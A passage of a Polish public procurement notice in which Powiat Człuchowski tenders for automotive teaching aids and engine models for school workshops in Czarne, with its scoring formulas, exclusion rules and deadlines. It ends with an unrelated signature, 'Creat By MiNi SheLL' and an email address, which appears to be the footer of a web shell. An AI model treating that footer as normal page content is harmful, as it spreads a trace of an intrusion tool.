„Termin wykonania” przedmiotu zamówienia, licząc od zawarcia umowy, przyznawane będą w poniższy sposób:<br/>a)	7 miesięcy – 0 pkt;<br/>b)	6 miesięcy – 2 pkt;<br/>c)	5 miesięcy – 5 pkt;<br/>d)	4 miesiące – 8 pkt;<br/>e)	3 miesiące – 10 pkt;<br/>f)	2 miesiące – 15 pkt;<br/>g)	1 miesiąc – 20 pkt.<br/>3)	Punkty za kryterium „Okres gwarancji” przyznawane będą za przedmiot zamówienia w poniższy sposób:<br/>a)	12 miesięcy gwarancji – 0 pkt,<br/>b)	24 miesiące gwarancji – 5 pkt.<br/>c)	36 miesięcy gwarancji – 10 pkt.<br/>W przypadku różnych okresów gwarancji proponowanych przez Wykonawcę dla przedmiotu zamówienia w tym samym pakiecie (części), Zamawiający dokona obliczenia ilości punktów wg średniej arytmetycznej okresu gwarancji - dla danego pakietu. <br/>4)	Punkty za kryterium „Parametry techniczne lub ogólne” przyznawane będą za przedmiot zamówienia w poniższy sposób:<br/> Parametry techniczne lub ogólne (ilość pkt. przyznana ofercie badanej)<br/> PTO = ------------------------------------------------------------------------------------------------- x 10 % x 100<br/> Parametry techniczne lub ogólne (max. ilość pkt możliwa do uzyskania w danej części)<br/>3.	Całkowita liczba punktów, jaką otrzyma dana oferta, zostanie obliczona wg poniższego wzoru:<br/>L = C + T + G + PTO<br/>gdzie:<br/>L – całkowita liczba punktów,<br/>C – punkty uzyskane w kryterium „Cena”,<br/>T – punkty uzyskane w kryterium „Termin wykonania”,<br/>G – punkty uzyskane w kryterium „Okres gwarancji na przedmiot zamówienia”,<br/>PTO - punkty uzyskane w kryterium „Parametry techniczne lub ogólne”.<br/>4.	Każda część zamówienia będzie oceniana oddzielnie wg ww. kryteriów.<br/>5.	Najwyższa liczba punktów wyznaczy najkorzystniejszą ofertę, oddzielnie dla każdej części.<br/>6.	Zamawiający udzieli zamówienia Wykonawcy, którego oferta odpowiadać będzie wszystkim wymaganiom przedstawionym w ustawie Pzp, oraz w SWZ i zostanie oceniona jako najkorzystniejsza w oparciu o podane kryteria wyboru.<br/>7.	Jeżeli nie będzie można dokonać wyboru oferty najkorzystniejszej ze względu na to, że dwie lub więcej ofert przedstawia taki sam bilans ceny i pozostałych kryteriów oceny ofert, Zamawiający spośród tych ofert dokona wyboru oferty z niższą ceną.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin wykonania ( T )</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">jakość, w tym do parametry techniczne, właściwości estetyczne i funkcjonalne takie jak dostępność dla osób niepełnosprawnych lub uwzględnianie potrzeb użytkowników</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji na przedmiot zamówienia (G)</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">Kryterium 4</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">jakość, w tym do parametry techniczne, właściwości estetyczne i funkcjonalne takie jak dostępność dla osób niepełnosprawnych lub uwzględnianie potrzeb użytkowników</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Parametry techniczne/ogólne ( PTO )</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 3)	Część nr 3 - Pomoce dydaktyczne<br/>a)	Dwuobwodowy układ hamulcowy – 1 szt;<br/>b)	ABS, ASR- system regulacji hamowania – 1 szt;<br/>c)	Most napędowy model – 1 szt;<br/>d)	Stanowisko Oświetlenie pojazdu – 1 szt;<br/>e)	Pneumatyczny układ hamulcowy ciężarówki – 1 szt;<br/>f)	Sensoryka pojazdu – 1 szt;<br/>g)	Skrzynia biegów automatyczna na stojaku - 1 szt;<br/>h)	System bezpieczeństwa biernego – 1 szt;<br/>i)	System sterowania silnikiem Common Rail – 1 szt;<br/>j)	System sterowania silnikiem Motronic – 1 szt;<br/>k)	Układy zapłonowe pojazdów – 1 szt;<br/>l)	Zestaw czujników elektronicznych pojazdu – 1 szt.<br/><br/>Przedmiot zamówienia będzie realizowany w miejscowości Czarne na potrzeby Warsztatów Szkolnych Samochodowych w Czarnem ul. Leśna 2a Zespołu Szkół Technicznych w Człuchowie, w ramach realizacji programu „Poprawa jakości kształcenia zawodowego na terenie Powiatu Człuchowskiego poprzez modernizację i rozbudowę Zespołu Szkół Technicznych w Człuchowie oraz Zespołu Szkół Ponadpodstawowych w Czarnem”.<br/>Przedmiot zamówienia został szczegółowo opisany w załączniku nr 1 do SWZ pn. Szczegółowy Opis Przedmiotu Zamówienia. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">39162100-6 - Pomoce dydaktyczne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">51500000-7 - Usługi instalowania maszyn i urządzeń</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">7 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Za ofertę najkorzystniejszą zostanie uznana oferta zawierająca najkorzystniejszy bilans punktów oddzielnie dla każdej części, w kryteriach, którym przypisano następujące znaczenie:<br/>1)	Cena (C) - waga 60%;<br/>2)	Termin wykonania ( T ) – 20 %;<br/>3)	Okres gwarancji na przedmiot zamówienia (G) – waga 10 %;<br/>4)	Parametry techniczne/ogólne ( PTO ) – waga 10 %.<br/>2.	Sposób oceny ofert:<br/>1)	Punkty za kryterium „ cena” będą obliczone wg poniższego wzoru:<br/>C = [(CN / CR) x 60%] x 100<br/>Wynik powyższego działania zostanie zaokrąglony do 2 miejsc po przecinku, gdzie:<br/>C – liczba punktów dla kryterium „cena”<br/>CN – najniższa oferowana cena, <br/>CR – cena oferty rozpatrywanej<br/>Cena oferty jest ceną brutto. <br/>2)	Punkty za kryterium „Termin wykonania” przedmiotu zamówienia, licząc od zawarcia umowy, przyznawane będą w poniższy sposób:<br/>a)	7 miesięcy – 0 pkt;<br/>b)	6 miesięcy – 2 pkt;<br/>c)	5 miesięcy – 5 pkt;<br/>d)	4 miesiące – 8 pkt;<br/>e)	3 miesiące – 10 pkt;<br/>f)	2 miesiące – 15 pkt;<br/>g)	1 miesiąc – 20 pkt.<br/>3)	Punkty za kryterium „Okres gwarancji” przyznawane będą za przedmiot zamówienia w poniższy sposób:<br/>a)	12 miesięcy gwarancji – 0 pkt,<br/>b)	24 miesiące gwarancji – 5 pkt.<br/>c)	36 miesięcy gwarancji – 10 pkt.<br/>W przypadku różnych okresów gwarancji proponowanych przez Wykonawcę dla przedmiotu zamówienia w tym samym pakiecie (części), Zamawiający dokona obliczenia ilości punktów wg średniej arytmetycznej okresu gwarancji - dla danego pakietu. <br/>4)	Punkty za kryterium „Parametry techniczne lub ogólne” przyznawane będą za przedmiot zamówienia w poniższy sposób:<br/> Parametry techniczne lub ogólne (ilość pkt. przyznana ofercie badanej)<br/> PTO = ------------------------------------------------------------------------------------------------- x 10 % x 100<br/> Parametry techniczne lub ogólne (max. ilość pkt możliwa do uzyskania w danej części)<br/>3.	Całkowita liczba punktów, jaką otrzyma dana oferta, zostanie obliczona wg poniższego wzoru:<br/>L = C + T + G + PTO<br/>gdzie:<br/>L – całkowita liczba punktów,<br/>C – punkty uzyskane w kryterium „Cena”,<br/>T – punkty uzyskane w kryterium „Termin wykonania”,<br/>G – punkty uzyskane w kryterium „Okres gwarancji na przedmiot zamówienia”,<br/>PTO - punkty uzyskane w kryterium „Parametry techniczne lub ogólne”.<br/>4.	Każda część zamówienia będzie oceniana oddzielnie wg ww. kryteriów.<br/>5.	Najwyższa liczba punktów wyznaczy najkorzystniejszą ofertę, oddzielnie dla każdej części.<br/>6.	Zamawiający udzieli zamówienia Wykonawcy, którego oferta odpowiadać będzie wszystkim wymaganiom przedstawionym w ustawie Pzp, oraz w SWZ i zostanie oceniona jako najkorzystniejsza w oparciu o podane kryteria wyboru.<br/>7.	Jeżeli nie będzie można dokonać wyboru oferty najkorzystniejszej ze względu na to, że dwie lub więcej ofert przedstawia taki sam bilans ceny i pozostałych kryteriów oceny ofert, Zamawiający spośród tych ofert dokona wyboru oferty z niższą ceną.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin wykonania ( T )</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">jakość, w tym do parametry techniczne, właściwości estetyczne i funkcjonalne takie jak dostępność dla osób niepełnosprawnych lub uwzględnianie potrzeb użytkowników</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji na przedmiot zamówienia (G)</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">Kryterium 4</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">jakość, w tym do parametry techniczne, właściwości estetyczne i funkcjonalne takie jak dostępność dla osób niepełnosprawnych lub uwzględnianie potrzeb użytkowników</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Parametry techniczne/ogólne ( PTO )</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 4)	Część nr 4 – Modele silników<br/>a)	Silnik rzędowy benzynowy- model – 1 szt;	<br/>b)	Silnik rzędowy diesel- model – 1 szt;<br/>c)	Stanowisko dydaktyczne silnika ZI wyposażonego w układ zasilania bezpośredniego wtrysku benzyny TSI, TFSI – 1 szt.<br/><br/>Przedmiot zamówienia będzie realizowany w miejscowości Czarne na potrzeby Warsztatów Szkolnych Samochodowych w Czarnem ul. Leśna 2a Zespołu Szkół Technicznych w Człuchowie, w ramach realizacji programu „Poprawa jakości kształcenia zawodowego na terenie Powiatu Człuchowskiego poprzez modernizację i rozbudowę Zespołu Szkół Technicznych w Człuchowie oraz Zespołu Szkół Ponadpodstawowych w Czarnem”.<br/>Przedmiot zamówienia został szczegółowo opisany w załączniku nr 1 do SWZ pn. Szczegółowy Opis Przedmiotu Zamówienia. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">39162100-6 - Pomoce dydaktyczne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">34310000-3 - Silniki do pojazdów i części silników</p> <p class="mb-0">51500000-7 - Usługi instalowania maszyn i urządzeń</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">7 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Za ofertę najkorzystniejszą zostanie uznana oferta zawierająca najkorzystniejszy bilans punktów oddzielnie dla każdej części, w kryteriach, którym przypisano następujące znaczenie:<br/>1)	Cena (C) - waga 60%;<br/>2)	Termin wykonania ( T ) – 20 %;<br/>3)	Okres gwarancji na przedmiot zamówienia (G) – waga 10 %;<br/>4)	Parametry techniczne/ogólne ( PTO ) – waga 10 %.<br/>2.	Sposób oceny ofert:<br/>1)	Punkty za kryterium „ cena” będą obliczone wg poniższego wzoru:<br/>C = [(CN / CR) x 60%] x 100<br/>Wynik powyższego działania zostanie zaokrąglony do 2 miejsc po przecinku, gdzie:<br/>C – liczba punktów dla kryterium „cena”<br/>CN – najniższa oferowana cena, <br/>CR – cena oferty rozpatrywanej<br/>Cena oferty jest ceną brutto. <br/>2)	Punkty za kryterium „Termin wykonania” przedmiotu zamówienia, licząc od zawarcia umowy, przyznawane będą w poniższy sposób:<br/>a)	7 miesięcy – 0 pkt;<br/>b)	6 miesięcy – 2 pkt;<br/>c)	5 miesięcy – 5 pkt;<br/>d)	4 miesiące – 8 pkt;<br/>e)	3 miesiące – 10 pkt;<br/>f)	2 miesiące – 15 pkt;<br/>g)	1 miesiąc – 20 pkt.<br/>3)	Punkty za kryterium „Okres gwarancji” przyznawane będą za przedmiot zamówienia w poniższy sposób:<br/>a)	12 miesięcy gwarancji – 0 pkt,<br/>b)	24 miesiące gwarancji – 5 pkt.<br/>c)	36 miesięcy gwarancji – 10 pkt.<br/>W przypadku różnych okresów gwarancji proponowanych przez Wykonawcę dla przedmiotu zamówienia w tym samym pakiecie (części), Zamawiający dokona obliczenia ilości punktów wg średniej arytmetycznej okresu gwarancji - dla danego pakietu. <br/>4)	Punkty za kryterium „Parametry techniczne lub ogólne” przyznawane będą za przedmiot zamówienia w poniższy sposób:<br/> Parametry techniczne lub ogólne (ilość pkt. przyznana ofercie badanej)<br/> PTO = ------------------------------------------------------------------------------------------------- x 10 % x 100<br/> Parametry techniczne lub ogólne (max. ilość pkt możliwa do uzyskania w danej części)<br/>3.	Całkowita liczba punktów, jaką otrzyma dana oferta, zostanie obliczona wg poniższego wzoru:<br/>L = C + T + G + PTO<br/>gdzie:<br/>L – całkowita liczba punktów,<br/>C – punkty uzyskane w kryterium „Cena”,<br/>T – punkty uzyskane w kryterium „Termin wykonania”,<br/>G – punkty uzyskane w kryterium „Okres gwarancji na przedmiot zamówienia”,<br/>PTO - punkty uzyskane w kryterium „Parametry techniczne lub ogólne”.<br/>4.	Każda część zamówienia będzie oceniana oddzielnie wg ww. kryteriów.<br/>5.	Najwyższa liczba punktów wyznaczy najkorzystniejszą ofertę, oddzielnie dla każdej części.<br/>6.	Zamawiający udzieli zamówienia Wykonawcy, którego oferta odpowiadać będzie wszystkim wymaganiom przedstawionym w ustawie Pzp, oraz w SWZ i zostanie oceniona jako najkorzystniejsza w oparciu o podane kryteria wyboru.<br/>7.	Jeżeli nie będzie można dokonać wyboru oferty najkorzystniejszej ze względu na to, że dwie lub więcej ofert przedstawia taki sam bilans ceny i pozostałych kryteriów oceny ofert, Zamawiający spośród tych ofert dokona wyboru oferty z niższą ceną.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin wykonania ( T )</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">jakość, w tym do parametry techniczne, właściwości estetyczne i funkcjonalne takie jak dostępność dla osób niepełnosprawnych lub uwzględnianie potrzeb użytkowników</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji na przedmiot zamówienia (G)</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">Kryterium 4</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">jakość, w tym do parametry techniczne, właściwości estetyczne i funkcjonalne takie jak dostępność dla osób niepełnosprawnych lub uwzględnianie potrzeb użytkowników</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Parametry techniczne/ogólne ( PTO )</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-10-29 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/pn/powiat_czluchow</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-10-29 09:05</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-11-27</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 2.	Zgodnie z art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego, z postępowania o udzielenie zamówienia publicznego lub z konkursu zamawiający wyklucza:<br/>1)	wykonawcę oraz uczestnika konkursu wymienionego w wykazach określonych w rozporządzeniu 765/2006 i rozporządzeniu 269/2014 albo wpisanego na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu środka, o którym mowa w art. 1 pkt 3;<br/>2)	wykonawcę oraz uczestnika konkursu, którego beneficjentem rzeczywistym w rozumieniu ustawy z 1 marca 2018 r. o przeciwdziałaniu praniu pieniędzy oraz finansowaniu terroryzmu jest osoba wymieniona w wykazach określonych w rozporządzeniu 765/2006 i rozporządzeniu 269/2014 albo wpisana na listę lub będąca takim beneficjentem rzeczywistym od 24 lutego 2022 r., o ile została wpisana na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu środka, o którym mowa w art. 1 pkt 3;<br/>3)	wykonawcę oraz uczestnika konkursu, którego jednostką dominującą w rozumieniu art. 3 ust. 1 pkt 37 ustawy z 29 września 1994 r. o rachunkowości jest podmiot wymieniony w wykazach określonych w rozporządzeniu 765/2006 i rozporządzeniu 269/2014 albo wpisany na listę lub będący taką jednostką dominującą od 24 lutego 2022 r., o ile został wpisany na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu środka, o którym mowa w art. 1 pkt 3.<br/>Wykluczenie następuje na okres trwania okoliczności określonych w ust. 2.

Creat By MiNi SheLL
Email: jattceo@gmail.com